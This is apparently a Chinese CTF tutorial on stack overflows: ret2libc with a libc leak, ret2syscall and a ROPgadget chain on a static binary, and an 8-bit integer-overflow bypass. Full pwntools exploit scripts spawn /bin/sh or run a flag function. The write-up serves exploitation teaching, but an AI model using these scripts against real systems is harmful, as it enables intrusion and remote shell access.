程序六 ：ret2libc

• IDA靜態(tài)分析

int __cdecl main(int argc, const char **argv, const char **envp) { ?char s; // [esp+1Ch] [ebp-64h] ?setvbuf(stdout, 0, 2, 0); ?setvbuf(_bss_start, 0, 1, 0); ?puts("RET2LIBC >_<"); ?gets(&s); ?return 0; } .rodata:08048720 aBinSh ? ? ? ? ?db '/bin/sh',0 ? ? ? ? ?; DATA XREF: .data:shell↓o .text:08048618 ; __unwind { ==>main函數(shù)的地址,用以中轉(zhuǎn) .text:08048618 ? ? ? ? ? ? ? ? push ? ?ebp .text:08048619 ? ? ? ? ? ? ? ? mov ? ? ebp, esp .text:0804867B ? ? ? ? ? ? ? ? mov ? ? [esp], eax ? ? ?; s ==>設(shè)置斷點(diǎn) .text:0804867E ? ? ? ? ? ? ? ? call ? ?_gets

保護(hù)機(jī)制

? ?ret2libc1 checksec ret2libc1 ? [*] '/mnt/hgfs/ctf_debug/stack/ret2libc1/ret2libc1' ? ?Arch: ? ? i386-32-little ? ?RELRO: ? ?Partial RELRO ? ?Stack: ? ?No canary found ? ?NX: ? ? ? NX enabled ? ?PIE: ? ? ?No PIE (0x8048000)

攻擊腳本

from pwn import * context.arch = "i386" context.log_level = "debug" context.terminal = ["tmux","splitw","-h"] if len(sys.argv) < 2: debug ?= True else: debug = False if debug: p = process("./ret2libc1") elf = ELF("./ret2libc1") libc = ELF("/lib/i386-linux-gnu/libc-2.23.so") else: p = remote("x.x.x.x",xxxx) elf = ELF("./ret2libc1") libc = ELF("/lib/i386-linux-gnu/libc-2.23.so") def debugf(): gdb.attach(p,"b *0804867B") ?# 設(shè)置斷點(diǎn)到gets之前 debugf() binsh = 0x08048720 puts_plt = elf.plt["puts"] ''' 注意到到當(dāng)前程序中有puts函數(shù)，通過(guò)plt表找到puts函數(shù)的地址以準(zhǔn)備leak puts在libc中的地址 這里不能使用got表,got里面的地址需要call。 ''' puts_got = elf.got["puts"] main_addr = 0x08048618 padding = 0x6c * "a" padding_ebp = 'junk' payload = padding + padding_ebp + p32(puts_plt) + p32(main_addr) + p32(puts_got) ''' main_addr:puts_plt的返回地址 puts_got：puts_plt的參數(shù) ''' p.sendlineafter("RET2LIBC >_<\n",payload) puts_addr = u32(p.recv(4)) log.success("puts_addr : " + hex(puts_addr)) ''' 調(diào)用puts函數(shù)打印puts函數(shù)在libc中的地址 libc的地址為4個(gè)字節(jié) ''' libc.address = puts_addr - libc.symbols["puts"] log.success("libc.address : " + hex(libc.address)) system_addr = libc.symbols["system"] ''' libc.symbol["puts"]為puts在libc中的offset 至此載入libc的基址 ''' log.success("system_addr : " + hex(system_addr)) ''' 如果程序本身沒(méi)有/bin/sh的話 binsh = libc.search("/bin/sh").next() log.success("binsh : " + hex(binsh)) ''' padding = 0x64 * "a" payload = padding + padding_ebp + p32(system_addr) + 'junk' + p32(binsh) ''' 0x64 * "a" : 因?yàn)榈诙螌ぶ贩绞綖閑bp尋址,不用加8 這里的junk為p32(system_addr)的返回地址 ''' p.sendlineafter("RET2LIBC >_<\n",payload) p.interactive()

思路

泄露libc的地址需要使用libc中函數(shù)如puts函數(shù)的地址減去偏移量獲得 調(diào)用puts_plt函數(shù)將puts_got的地址打印出來(lái)，puts_got的地址的地址即是libc中puts的地址 通過(guò)第一次溢出獲得libc中puts的地址。構(gòu)造一次循環(huán)，返回到main 通過(guò)puts的地址計(jì)算libc的地址，通過(guò)symbols從而得到system的地址 第二次計(jì)算padding的大小按照ebp尋址，直接為0×64，因?yàn)檫@時(shí)候直接返回到了ESP

調(diào)試

finish到main

查看棧布局 stack50

main得返回地址被正確填充為puts

進(jìn)入got的puts函數(shù)，leak出的地址信息，查看當(dāng)前的棧布局

再次跳轉(zhuǎn)回main函數(shù),發(fā)送payload

ebp被正確覆蓋為junk，return被正確覆蓋為system的地址，system函數(shù)的返回地址被覆蓋為junk，參數(shù)成功覆蓋成/bin/sh的地址

攻擊腳本2(在程序段無(wú)/bin/sh的通用利用方式，向bss段寫(xiě)入/bin/sh)

from pwn import * context.arch = "i386" context.log_level = "debug" context.terminal = ["tmux","splitw","-h"] if len(sys.argv) < 2: debug ?= True else: debug = False if debug: p = process("./ret2libc1") elf = ELF("./ret2libc1") libc = ELF("/lib/i386-linux-gnu/libc-2.23.so") else: p = remote("x.x.x.x",xxxx) elf = ELF("./ret2libc1") libc = ELF("/lib/i386-linux-gnu/libc-2.23.so") def debugf(): gdb.attach(p,"b *0804867B") puts_plt = elf.plt["puts"] puts_got = elf.got["puts"] gets_plt = elf.plt["gets"] main_addr = 0x08048618 bss_addr = 0x0804A064 padding = 0x6c * "a" padding_ebp = 'junk' payload = padding + padding_ebp + p32(puts_plt) + p32(main_addr) + p32(puts_got) p.sendlineafter("RET2LIBC >_<\n",payload) puts_addr = u32(p.recv(4)) log.success("puts_addr : " + hex(puts_addr)) libc.address = puts_addr - libc.symbols["puts"] log.success("libc.address : " + hex(libc.address)) system_addr = libc.symbols["system"] log.success("system_addr : " + hex(system_addr)) padding = 0x64 * "a" payload = padding + padding_ebp + p32(gets_plt) + p32(system_addr) + p32(bss_addr) + p32(bss_addr) p.sendlineafter("RET2LIBC >_<\n",payload) p.send("/bin/sh\n") p.interactive()

思路

尋找一片空閑的bss段區(qū)域 .bss:0804A060 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ; main+9↑r .bss:0804A060 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ; Alternative name is 'stdout' .bss:0804A060 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ; Copy of shared data .bss:0804A064 completed_6591 ?db ? ? ? ? ? ? ? ? ? ? ?; DATA XREF: __do_global_dtors_aux↑r .bss:0804A064 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ; __do_global_dtors_aux+14↑w gets_plt用于向緊接著返回地址system_addr之后的p32(bss_addr)寫(xiě)入數(shù)據(jù)，返回到system_addr，執(zhí)行最后的p32(bss_addr)

程序七 ：ret2syacall & ropchain

對(duì)于靜態(tài)編譯程序

? speedrun ldd speedrun 不是動(dòng)態(tài)可執(zhí)行文件

在有棧溢出的時(shí)候，優(yōu)先考慮ropchain的方法。

ret2syacall

• IDA靜態(tài)分析

查找字符串 .text:0000000000400B6B lea rdi, aAnyLastWords ; "c" 進(jìn)入main函數(shù) __int64 sub_400B60() { char buf; // [rsp+0h] [rbp-400h] sub_410390("Any last words?"); sub_4498A0(0, &buf, 0x7D0uLL); return sub_40F710((unsigned __int64)"This will be the last thing that you say: %s\n"); } 索引到 __int64 sub_400BC1() ==>main函數(shù) { const char *v0; // rdi sub_410590(off_6B97A0, 0LL, 2LL, 0LL); ? ?==>setbuf v0 = "DEBUG"; if ( !sub_40E790("DEBUG") ) ==>setenv v0 = (const char *)5; sub_400B4D(v0); sub_400B60(); sub_400BAE(); return 0LL; } __int64 sub_400B4D() ?==>puts { return sub_410390("Hello brave new challenger"); } __int64 sub_400B60() ==>printf { char buf; // [rsp+0h] [rbp-400h] sub_410390("Any last words?"); sub_4498A0(0, &buf, 0x7D0uLL); ==>read ?,溢出點(diǎn) return sub_40F710((unsigned __int64)"This will be the last thing that you say: %s\n", &buf); ==>手動(dòng)添加參數(shù)buf }

edit – keypatch修改alarm為nop，為了方便調(diào)試

根據(jù)函數(shù)的功能確定函數(shù)的類型

思路

設(shè)置斷點(diǎn) .text:0000000000400B60 ; __unwind { .text:0000000000400B60 ? ? ? ? ? ? ? ? push ? ?rbp .text:0000000000400B61 ? ? ? ? ? ? ? ? mov ? ? rbp, rsp .text:0000000000400B64 ? ? ? ? ? ? ? ? sub ? ? rsp, 400h .text:0000000000400B6B ? ? ? ? ? ? ? ? lea ? ? rdi, aAnyLastWords ; "Any last words?" .text:0000000000400B72 ? ? ? ? ? ? ? ? call ? ?sub_410390 .text:0000000000400B77 ? ? ? ? ? ? ? ? lea ? ? rax, [rbp+buf] .text:0000000000400B7E ? ? ? ? ? ? ? ? mov ? ? edx, 7D0h ? ? ? ; count .text:0000000000400B83 ? ? ? ? ? ? ? ? mov ? ? rsi, rax ? ? ? ?; buf .text:0000000000400B86 ? ? ? ? ? ? ? ? mov ? ? edi, 0 ? ? ? ? ?; fd .text:0000000000400B8B ? ? ? ? ? ? ? ? call ? ?sub_4498A0 ==>call read .text:0000000000400B90 ? ? ? ? ? ? ? ? lea ? ? rax, [rbp+buf] .text:0000000000400B97 ? ? ? ? ? ? ? ? mov ? ? rsi, rax ? ? ? ?; char * .text:0000000000400B9A ? ? ? ? ? ? ? ? lea ? ? rdi, aThisWillBeTheL ; "This will be the last thing that you sa"... .text:0000000000400BA1 ? ? ? ? ? ? ? ? mov ? ? eax, 0 .text:0000000000400BA6 ? ? ? ? ? ? ? ? call ? ?sub_40F710 .text:0000000000400BAB ? ? ? ? ? ? ? ? nop .text:0000000000400BAC ? ? ? ? ? ? ? ? leave .text:0000000000400BAD ? ? ? ? ? ? ? ? retn .text:0000000000400BAD ; } // starts at 400B60 搜索syscall ? ?speedrun ROPgadget --binary speedrun --only 'int' ? ? Gadgets information ============================================================ 0x000000000046817a : int 0x80 Unique gadgets found: 1 尋找rop鏈 ? ?speedrun ROPgadget --binary speedrun --only 'pop|ret' | grep rax 0x0000000000481c76 : pop rax ; pop rdx ; pop rbx ; ret ==pop_rax_rdx_rbx_ret 0x0000000000415664 : pop rax ; ret 0x000000000048cccb : pop rax ; ret 0x22 ? ?speedrun ROPgadget --binary speedrun --only 'pop|ret' | grep rdx 0x0000000000481c76 : pop rax ; pop rdx ; pop rbx ; ret 0x000000000044be14 : pop rdx ; pop r10 ; ret 0x0000000000481c77 : pop rdx ; pop rbx ; ret 0x000000000044be39 : pop rdx ; pop rsi ; ret 0x00000000004498b5 : pop rdx ; ret ? ?speedrun ROPgadget --binary speedrun --only 'pop|ret' | grep rdi 0x0000000000402615 : pop rdi ; pop rbp ; ret 0x0000000000400686 : pop rdi ; ret ? ?speedrun ROPgadget --binary speedrun --only 'pop|ret' | grep rsi 0x000000000044be39 : pop rdx ; pop rsi ; ret 0x0000000000402613 : pop rsi ; pop r15 ; pop rbp ; ret 0x0000000000400684 : pop rsi ; pop r15 ; ret 0x000000000040f95e : pop rsi ; pop rbp ; ret 0x00000000004101f3 : pop rsi ; ret read一個(gè)/bin/sh .text:00000000004498A0 ; __unwind { .text:00000000004498A0 ? ? ? ? ? ? ? ? mov ? ? eax, cs:dword_6BC80C .text:00000000004498A6 ? ? ? ? ? ? ? ? test ? ?eax, eax .text:00000000004498A8 ? ? ? ? ? ? ? ? jnz ? ? short loc_4498C0 .text:00000000004498AA ? ? ? ? ? ? ? ? xor ? ? eax, eax ==>read_addr .text:00000000004498AC ? ? ? ? ? ? ? ? syscall ? ? ? ? ? ? ? ? ; LINUX - sys_read .bss:00000000006BB3B2 ? ? ? ? ? ? ? ? db ? ?? ; ==>binsh_addr .bss:00000000006BB3B3 ? ? ? ? ? ? ? ? db ? ?? ; .bss:00000000006BB3B4 ? ? ? ? ? ? ? ? db ? ?? ; .bss:00000000006BB3B5 ? ? ? ? ? ? ? ? db ? ?? ; 構(gòu)造rop鏈 payload = 0x400*'a' + 'junkjunk' + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(bss_addr) + p64(pop_rdx_ret) + p64(0x10) + p64(read_addr) payload += p64(pop_rax_rdx_ret) + p64(0x3b) + p64(0) + p64(0) + p64(pop_rdi_ret) + p64(bss_addr) + p

攻擊腳本

from pwn import * context.log_level = "debug" context.arch = 'amd64' context.terminal =["tmux","splitw","-h"] if len(sys.argv)<2: debug =True else: debug =False if debug: p =process("./speedrun") else : p = remote("xxxx",xxx) def debugf(): gdb.attach(p,"b * 0x4498E2") # rax 0x3b # rdi /bin/sh # rsi NULL 0 # rdx NULL 0 pop_rax_rdx_rbx_ret = 0x481c76 pop_rdi_ret ?=0x400686 pop_rsi_ret ?=0x4101f3 #read_addr =0x4498A0 read_addr =0x4498AA syscall=0x46817a bss_addr = 0x6BB3B3 padding = 'a'*0x400 pop_rdx_ret =0x4498b5 #debugf() payload = ?padding + "junkjunk" + p64(pop_rdi_ret) + p64(0) +p64(pop_rsi_ret) + p64(bss_addr) +p64(pop_rdx_ret)+p64(0x8) # p64(0) is the para of ?p64(pop_rdi_ret),p64(bss_addr) is the para of p64(pop_rsi_ret)... payload += p64(read_addr) + p64(pop_rax_rdx_rbx_ret)+p64(0x3b)+p64(0)+p64(0)+p64(pop_rdi_ret) + p64(bss_addr) +p64(pop_rsi_ret) payload += p64(0)+p64(syscall) p.sendafter("Any last words?\n",payload) p.send("/bin/sh\x00") p.interactive()

調(diào)試

read之后的棧布局

ropchain

• 尋找ropchain

ROPgadget –binary speedrun –ropchain

攻擊腳本

from pwn import * if len(sys.argv)<2: debug =True else: debug =False if debug: p =process("./speedrun-001") else : p = remote("xxxx",xxx) def ropchanin(): from struct import pack # Padding goes here p = '' p += pack('<Q', 0x00000000004101f3) # pop rsi ; ret p += pack('<Q', 0x00000000006b90e0) # @ .data p += pack('<Q', 0x0000000000415664) # pop rax ; ret p += '/bin//sh' p += pack('<Q', 0x000000000047f471) # mov qword ptr [rsi], rax ; ret p += pack('<Q', 0x00000000004101f3) # pop rsi ; ret p += pack('<Q', 0x00000000006b90e8) # @ .data + 8 p += pack('<Q', 0x0000000000444bc0) # xor rax, rax ; ret p += pack('<Q', 0x000000000047f471) # mov qword ptr [rsi], rax ; ret p += pack('<Q', 0x0000000000400686) # pop rdi ; ret p += pack('<Q', 0x00000000006b90e0) # @ .data p += pack('<Q', 0x00000000004101f3) # pop rsi ; ret p += pack('<Q', 0x00000000006b90e8) # @ .data + 8 p += pack('<Q', 0x00000000004498b5) # pop rdx ; ret p += pack('<Q', 0x00000000006b90e8) # @ .data + 8 p += pack('<Q', 0x0000000000444bc0) # xor rax, rax ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x00000000004748c0) # add rax, 1 ; ret p += pack('<Q', 0x0000000000474e65) # syscall ; ret return p padding = 'a'*0x400 payload = padding + "junkjunk" + ropchanin() p.sendafter("Any last words?\n",payload) p.interactive()

程序八 ：整型溢出

• IDA靜態(tài)分析

int __cdecl main() { ?int v1; // [esp+Ch] [ebp-Ch] ?setbuf(stdin, 0); ?setbuf(stdout, 0); ?setbuf(stderr, 0); ?puts("---------------------"); ?puts("~~ Welcome to CTF! ~~"); ?puts(" ? ? ? 1.Login ? ? ? "); ?puts(" ? ? ? 2.Exit ? ? ? ?"); ?puts("---------------------"); ?printf("Your choice:"); ?__isoc99_scanf("%d", &v1); ?if ( v1 == 1 ) ?{ ? ?login(); ?} ?else ?{ ? ?if ( v1 == 2 ) ? ?{ ? ? ?puts("Bye~"); ? ? ?exit(0); ? ?} ? ?puts("Invalid Choice!"); ?} ?return 0; } int login() { ?char buf; // [esp+0h] [ebp-228h] ?char s; // [esp+200h] [ebp-28h] ?memset(&s, 0, 0x20u); ?memset(&buf, 0, 0x200u); ?puts("Please input your username:"); ?read(0, &s, 0x19u); ?printf("Hello %s\n", &s); ?puts("Please input your passwd:"); ?read(0, &buf, 0x199u); ?return check(&buf); } char *__cdecl check(char *s) { ?char *result; // eax ?char dest; // [esp+4h] [ebp-14h] ?unsigned __int8 v3; // [esp+Fh] [ebp] v3的大小為8位1個(gè)字節(jié) ?v3 = strlen(s); ?//控制s為259 ==> 0x104 ==> v3=4 （v3只取s長(zhǎng)度的最低位） ?if ( v3 <= 3u || v3 > 8u ) ?{ ? ?puts("Invalid Password"); ? ?result = (char *)fflush(stdout); ?} ?else ?{ ? ?puts("Success"); ? ?fflush(stdout); ? ?result = strcpy(&dest, s); //通過(guò)s覆蓋dest ---> 覆蓋返回值地址 ?} ?return result; }

查看保護(hù)機(jī)制

? ?login checksec login ? ? [*] '/mnt/hgfs/ctf_debug/stack/login/login' ? ?Arch: ? ? i386-32-little ? ?RELRO: ? ?Partial RELRO ? ?Stack: ? ?No canary found ? ?NX: ? ? ? NX enabled ? ?PIE: ? ? ?No PIE (0x8048000)

• 可構(gòu)造rop鏈

• 但是轉(zhuǎn)而發(fā)現(xiàn)程序中提供了更簡(jiǎn)單的cat flag 函數(shù)

int sub_804868B() { ?return system("cat flag"); } .text:0804868B sub_804868B ? ? proc near .text:0804868B ; __unwind { .text:0804868B ? ? ? ? ? ? ? ? push ? ?ebp .text:0804868C ? ? ? ? ? ? ? ? mov ? ? ebp, esp .text:0804868E ? ? ? ? ? ? ? ? sub ? ? esp, 8 .text:08048691 ? ? ? ? ? ? ? ? sub ? ? esp, 0Ch .text:08048694 ? ? ? ? ? ? ? ? push ? ?offset command ?; "cat flag" .text:08048699 ? ? ? ? ? ? ? ? call ? ?_system .text:0804869E ? ? ? ? ? ? ? ? add ? ? esp, 10h .text:080486A1 ? ? ? ? ? ? ? ? nop .text:080486A2 ? ? ? ? ? ? ? ? leave .text:080486A3 ? ? ? ? ? ? ? ? retn .text:080486A3 ; } // starts at 804868B

設(shè)置斷點(diǎn)

.text:080486AD ? ? ? ? ? ? ? ? push ? ?[ebp+s] ? ? ? ? ; s .text:080486B0 ? ? ? ? ? ? ? ? call ? ?_strlen .text:080486B5 ? ? ? ? ? ? ? ? add ? ? esp, 10h .text:080486B8 ? ? ? ? ? ? ? ? mov ? ? [ebp+var_9], al ==>設(shè)置斷點(diǎn) .text:080486BB ? ? ? ? ? ? ? ? cmp ? ? [ebp+var_9], 3

攻擊腳本

from pwn import * context.arch='i386' context.log_level = "debug" context.terminal =["tmux","splitw","-h"] if len(sys.argv)<2: ? ?debug =True else: ? ?debug=False ? ? if debug: ? ?p=process("./login") ? ?elf =ELF("./login") ? ?libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") else : ? ?p=remote("Xxx.xxx.xxx.xx",xxx) ? ?elf =ELF("./login") ? ?libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") ? ? def login(username,passwd): ? ?p.sendlineafter("Your choice:","1") ? ?p.sendlineafter("Please input your username:\n",username) ? ?p.sendlineafter("Please input your passwd:\n",passwd) def debugf(): ? ?gdb.attach(p,"b * 0x80486B8") ? ? debugf() cat_flag = 0x804868B offset = 0x100+0x4 payload = 'a'*0x14 + 'junk' + p32(cat_flag) payload = payload.ljust(offset,"a") login("chandler",payload)print p.recvall()

這篇文章有點(diǎn)長(zhǎng)啊，能看到這兒，知了姐先給你點(diǎn)個(gè)贊！希望大家都能堅(jiān)持學(xué)習(xí)，為夢(mèng)想前進(jìn)！